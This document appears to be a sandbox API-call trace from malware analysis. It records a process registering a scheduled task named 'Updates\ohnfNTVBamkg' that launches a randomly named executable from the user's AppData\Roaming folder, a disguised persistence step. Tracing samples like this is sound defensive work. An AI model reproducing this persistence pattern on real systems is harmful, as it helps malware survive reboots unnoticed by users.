[0223.191] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.191] lstrlenW (lpString="|et|") returned 4
[0223.191] lstrlenW (lpString="|XML|") returned 5
[0223.191] RtlRestoreLastWin32Error () returned 0x490
[0223.191] lstrlenW (lpString="k") returned 1
[0223.191] lstrlenW (lpString="k") returned 1
[0223.191] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.191] lstrlenW (lpString="XML") returned 3
[0223.191] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.191] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|k|") returned 3
[0223.191] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.191] lstrlenW (lpString="|k|") returned 3
[0223.191] lstrlenW (lpString="|XML|") returned 5
[0223.192] RtlRestoreLastWin32Error () returned 0x490
[0223.192] lstrlenW (lpString="du") returned 2
[0223.192] lstrlenW (lpString="du") returned 2
[0223.192] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.192] lstrlenW (lpString="XML") returned 3
[0223.192] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.192] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|du|") returned 4
[0223.192] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.192] lstrlenW (lpString="|du|") returned 4
[0223.192] lstrlenW (lpString="|XML|") returned 5
[0223.192] RtlRestoreLastWin32Error () returned 0x490
[0223.192] lstrlenW (lpString="ri") returned 2
[0223.192] lstrlenW (lpString="ri") returned 2
[0223.192] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.192] lstrlenW (lpString="XML") returned 3
[0223.192] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.192] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ri|") returned 4
[0223.192] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.192] lstrlenW (lpString="|ri|") returned 4
[0223.192] lstrlenW (lpString="|XML|") returned 5
[0223.192] RtlRestoreLastWin32Error () returned 0x490
[0223.192] lstrlenW (lpString="z") returned 1
[0223.192] lstrlenW (lpString="z") returned 1
[0223.192] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.192] lstrlenW (lpString="XML") returned 3
[0223.193] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.193] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|z|") returned 3
[0223.193] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.193] lstrlenW (lpString="|z|") returned 3
[0223.193] lstrlenW (lpString="|XML|") returned 5
[0223.193] RtlRestoreLastWin32Error () returned 0x490
[0223.193] lstrlenW (lpString="f") returned 1
[0223.193] lstrlenW (lpString="f") returned 1
[0223.193] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.193] lstrlenW (lpString="XML") returned 3
[0223.193] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.193] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3
[0223.193] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.193] lstrlenW (lpString="|f|") returned 3
[0223.193] lstrlenW (lpString="|XML|") returned 5
[0223.193] RtlRestoreLastWin32Error () returned 0x490
[0223.193] lstrlenW (lpString="v1") returned 2
[0223.193] lstrlenW (lpString="v1") returned 2
[0223.193] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.193] lstrlenW (lpString="XML") returned 3
[0223.193] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.193] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|v1|") returned 4
[0223.193] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.193] lstrlenW (lpString="|v1|") returned 4
[0223.194] lstrlenW (lpString="|XML|") returned 5
[0223.194] RtlRestoreLastWin32Error () returned 0x490
[0223.194] lstrlenW (lpString="xml") returned 3
[0223.194] lstrlenW (lpString="xml") returned 3
[0223.194] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.194] lstrlenW (lpString="XML") returned 3
[0223.194] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.194] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|xml|") returned 5
[0223.194] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.194] lstrlenW (lpString="|xml|") returned 5
[0223.194] lstrlenW (lpString="|XML|") returned 5
[0223.194] StrStrIW (lpFirst="|xml|", lpSrch="|XML|") returned="|xml|"
[0223.194] RtlRestoreLastWin32Error () returned 0x0
[0223.194] RtlRestoreLastWin32Error () returned 0x0
[0223.194] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp") returned 52
[0223.194] lstrlenW (lpString="-/") returned 2
[0223.194] StrChrIW (lpStart="-/", wMatch=0x780043) returned 0x0
[0223.194] RtlRestoreLastWin32Error () returned 0x490
[0223.194] RtlRestoreLastWin32Error () returned 0x490
[0223.194] RtlRestoreLastWin32Error () returned 0x0
[0223.194] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp") returned 52
[0223.194] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp"
[0223.194] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp") returned 52
[0223.194] _memicmp (_Buf1=0x457450, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.194] _memicmp (_Buf1=0x45a9d0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.194] RtlRestoreLastWin32Error () returned 0x7a
[0223.194] RtlRestoreLastWin32Error () returned 0x0
[0223.195] RtlRestoreLastWin32Error () returned 0x0
[0223.195] lstrlenW (lpString="C") returned 1
[0223.195] RtlRestoreLastWin32Error () returned 0x490
[0223.195] RtlRestoreLastWin32Error () returned 0x0
[0223.195] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp") returned 52
[0223.195] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp") returned 52
[0223.195] GetProcessHeap () returned 0x450000
[0223.195] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x6a) returned 0x456a58
[0223.195] RtlRestoreLastWin32Error () returned 0x0
[0223.195] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp") returned 52
[0223.195] RtlRestoreLastWin32Error () returned 0x0
[0223.195] GetProcessHeap () returned 0x450000
[0223.195] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x1fc) returned 0x45ada8
[0223.196] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0223.203] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0223.221] CoCreateInstance (in: rclsid=0xb626c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xb626d0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xdd39c | out: ppv=0xdd39c*=0x783758) returned 0x0
[0223.534] TaskScheduler:ITaskService:Connect (This=0x783758, serverName=0xdd34c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xdd35c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xdd36c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xdd37c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0
[0223.541] TaskScheduler:ITaskService:GetFolder (in: This=0x783758, Path=0x0, ppFolder=0xdd464 | out: ppFolder=0xdd464*=0x783880) returned 0x0
[0223.544] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp1326.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x12c
[0223.545] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0xdcd7c | out: lpFileSize=0xdcd7c*=1646) returned 1
[0223.545] ReadFile (in: hFile=0x12c, lpBuffer=0xdcd8c, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0xdcd88, lpOverlapped=0x0 | out: lpBuffer=0xdcd8c*, lpNumberOfBytesRead=0xdcd88*=0x2, lpOverlapped=0x0) returned 1
[0223.545] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0223.545] malloc (_Size=0x66f) returned 0x7838d0
[0223.545] ReadFile (in: hFile=0x12c, lpBuffer=0x7838d0, nNumberOfBytesToRead=0x66f, lpNumberOfBytesRead=0xdcd88, lpOverlapped=0x0 | out: lpBuffer=0x7838d0*, lpNumberOfBytesRead=0xdcd88*=0x66e, lpOverlapped=0x0) returned 1
[0223.545] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x7838d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1647
[0223.545] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x7838d0, cbMultiByte=-1, lpWideCharStr=0x46a774, cchWideChar=1647 | out: lpWideCharStr="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ohnfNTVBamkg.exe\r\n \r\n \r\n") returned 1647
[0223.545] SysStringLen (param_1="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ohnfNTVBamkg.exe\r\n \r\n \r\n") returned 0x66e
[0223.546] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ohnfNTVBamkg.exe\r\n \r\n \r\n", pbstrResult=0xdcd2c | out: pbstrResult=0xdcd2c) returned 0x0
[0223.546] free (_Block=0x7838d0)
[0223.546] CloseHandle (hObject=0x12c) returned 1
[0223.547] lstrlenW (lpString="") returned 0
[0223.547] malloc (_Size=0xc) returned 0x783830
[0223.548] SysStringLen (param_1="") returned 0x0
[0223.548] free (_Block=0x783830)
[0223.548] lstrlenW (lpString="") returned 0
[0223.548] ITaskFolder:RegisterTask (in: This=0x783880, Path="Updates\\ohnfNTVBamkg", XmlText="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ohnfNTVBamkg.exe\r\n \r\n \r\n", flags=2, UserId=0xdcd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), password=0xdcd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=0, sddl=0xdcd84*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), ppTask=0xdcde0 | out: ppTask=0xdcde0*=0x783908) returned 0x0
[0224.577] GetProcessHeap () returned 0x450000
[0224.577] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x4654d8
[0224.577] _memicmp (_Buf1=0x457330, _Buf2=0xb62708, _Size=0x7) returned 0
[0224.577] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x45a798, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0224.577] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0224.577] GetProcessHeap () returned 0x450000
[0224.577] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x82) returned 0x4692b8
[0224.577] _vsnwprintf (in: _Buffer=0xdcdf8, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xdcd94 | out: _Buffer="SUCCESS: The scheduled task \"Updates\\ohnfNTVBamkg\" has successfully been created.\n") returned 82
[0224.577] __iob_func () returned 0x76b41208
[0224.577] _fileno (_File=0x76b41228) returned 1
[0224.577] _errno () returned 0x7805b0
[0224.577] _get_osfhandle (_FileHandle=1) returned 0x3c
[0224.577] _errno () returned 0x7805b0
[0224.577] GetFileType (hFile=0x3c) returned 0x2
[0224.578] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c
[0224.578] GetFileType (hFile=0x3c) returned 0x2
[0224.578] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdcd68 | out: lpMode=0xdcd68) returned 1
[0224.760] __iob_func () returned 0x76b41208
[0224.760] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c
[0224.760] lstrlenW (lpString="SUCCESS: The scheduled task \"Updates\\ohnfNTVBamkg\" has successfully been created.\n") returned 82
[0224.760] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdcdf8*, nNumberOfCharsToWrite=0x52, lpNumberOfCharsWritten=0xdcd8c, lpReserved=0x0 | out: lpBuffer=0xdcdf8*, lpNumberOfCharsWritten=0xdcd8c*=0x52) returned 1
[0224.769] IUnknown:Release (This=0x783908) returned 0x0
[0224.770] TaskScheduler:IUnknown:Release (This=0x783880) returned 0x0
[0224.770] TaskScheduler:IUnknown:Release (This=0x783758) returned 0x0
[0224.770] lstrlenW (lpString="") returned 0
[0224.770] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp") returned 52
[0224.770] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53
[0224.770] GetProcessHeap () returned 0x450000
[0224.770] GetProcessHeap () returned 0x450000
[0224.770] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x45ada8) returned 1
[0224.770] GetProcessHeap () returned 0x450000
[0224.770] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x45ada8) returned 0x1fc
[0224.770] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x45ada8) returned 1
[0224.771] GetProcessHeap () returned 0x450000
[0224.771] GetProcessHeap () returned 0x450000
[0224.771] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x456a58) returned 1
[0224.771] GetProcessHeap () returned 0x450000
[0224.771] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x456a58) returned 0x6a
[0224.771] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x456a58) returned 1
[0224.771] GetProcessHeap () returned 0x450000
[0224.771] GetProcessHeap () returned 0x450000
[0224.771] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4596c8) returned 1
[0224.771] GetProcessHeap () returned 0x450000
[0224.771] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4596c8) returned 0x16
[0224.771] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4596c8) returned 1
[0224.771] GetProcessHeap () returned 0x450000
[0224.771] GetProcessHeap () returned 0x450000
[0224.771] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x45ac10) returned 1
[0224.771] GetProcessHeap () returned 0x450000
[0224.771] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x45ac10) returned 0x10
[0224.772] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x45ac10) returned 1
[0224.772] GetProcessHeap () returned 0x450000
[0224.772] GetProcessHeap () returned 0x450000
[0224.772] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459348) returned 1
[0224.772] GetProcessHeap () returned 0x450000
[0224.772] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459348) returned 0x14
[0224.772] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459348) returned 1
[0224.772] GetProcessHeap () returned 0x450000
[0224.772] GetProcessHeap () returned 0x450000
[0224.772] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x458ef0) returned 1
[0224.772] GetProcessHeap () returned 0x450000
[0224.772] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x458ef0) returned 0xa0
[0224.772] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x458ef0) returned 1
[0224.772] GetProcessHeap () returned 0x450000
[0224.772] GetProcessHeap () returned 0x450000
[0224.772] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x457390) returned 1
[0224.772] GetProcessHeap () returned 0x450000
[0224.772] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x457390) returned 0x10
[0224.773] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x457390) returned 1
[0224.773] GetProcessHeap () returned 0x450000
[0224.773] GetProcessHeap () returned 0x450000
[0224.773] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4593c8) returned 1
[0224.773] GetProcessHeap () returned 0x450000
[0224.773] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4593c8) returned 0x14
[0224.773] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4593c8) returned 1
[0224.773] GetProcessHeap () returned 0x450000
[0224.773] GetProcessHeap () returned 0x450000
[0224.773] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4569e0) returned 1
[0224.773] GetProcessHeap () returned 0x450000
[0224.773] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4569e0) returned 0x6e
[0224.773] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4569e0) returned 1
[0224.773] GetProcessHeap () returned 0x450000
[0224.774] GetProcessHeap () returned 0x450000
[0224.774] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x45a9d0) returned 1
[0224.774] GetProcessHeap () returned 0x450000
[0224.774] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x45a9d0) returned 0x10
[0224.774] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x45a9d0) returned 1
[0224.774] GetProcessHeap () returned 0x450000
[0224.774] GetProcessHeap () returned 0x450000
[0224.774] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459428) returned 1
[0224.774] GetProcessHeap () returned 0x450000
[0224.774] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459428) returned 0x14
[0224.794] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459428) returned 1
[0224.794] GetProcessHeap () returned 0x450000
[0224.794] GetProcessHeap () returned 0x450000
[0224.794] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x457480) returned 1
[0224.794] GetProcessHeap () returned 0x450000
[0224.794] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x457480) returned 0xc
[0224.794] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x457480) returned 1
[0224.794] GetProcessHeap () returned 0x450000
[0224.794] GetProcessHeap () returned 0x450000
[0224.794] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x457450) returned 1
[0224.794] GetProcessHeap () returned 0x450000
[0224.794] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x457450) returned 0x10
[0224.795] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x457450) returned 1
[0224.795] GetProcessHeap () returned 0x450000
[0224.795] GetProcessHeap () returned 0x450000
[0224.795] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459328) returned 1
[0224.795] GetProcessHeap () returned 0x450000
[0224.795] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459328) returned 0x14
[0224.795] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459328) returned 1
[0224.795] GetProcessHeap () returned 0x450000
[0224.795] GetProcessHeap () returned 0x450000
[0224.795] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x458ce0) returned 1
[0224.795] GetProcessHeap () returned 0x450000
[0224.795] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x458ce0) returned 0x208
[0224.795] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x458ce0) returned 1
[0224.795] GetProcessHeap () returned 0x450000
[0224.795] GetProcessHeap () returned 0x450000
[0224.795] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x457360) returned 1
[0224.795] GetProcessHeap () returned 0x450000
[0224.796] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x457360) returned 0x10
[0224.796] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x457360) returned 1
[0224.796] GetProcessHeap () returned 0x450000
[0224.796] GetProcessHeap () returned 0x450000
[0224.796] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459448) returned 1
[0224.796] GetProcessHeap () returned 0x450000
[0224.796] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459448) returned 0x14
[0224.796] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459448) returned 1
[0224.796] GetProcessHeap () returned 0x450000
[0224.796] GetProcessHeap () returned 0x450000
[0224.796] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x45a798) returned 1
[0224.796] GetProcessHeap () returned 0x450000
[0224.796] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x45a798) returned 0x200
[0224.796] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x45a798) returned 1
[0224.796] GetProcessHeap () returned 0x450000
[0224.796] GetProcessHeap () returned 0x450000
[0224.796] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x457330) returned 1
[0224.796] GetProcessHeap () returned 0x450000
[0224.796] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x457330) returned 0x10
[0224.797] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x457330) returned 1
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459508) returned 1
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459508) returned 0x14
[0224.797] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459508) returned 1
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4595c8) returned 1
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4595c8) returned 0x14
[0224.797] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4595c8) returned 1
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4574e0) returned 1
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4574e0) returned 0x10
[0224.797] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4574e0) returned 1
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x452780) returned 1
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x452780) returned 0x14
[0224.797] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x452780) returned 1
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] GetProcessHeap () returned 0x450000
[0224.797] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4595e8) returned 1
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4595e8) returned 0x16
[0224.798] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4595e8) returned 1
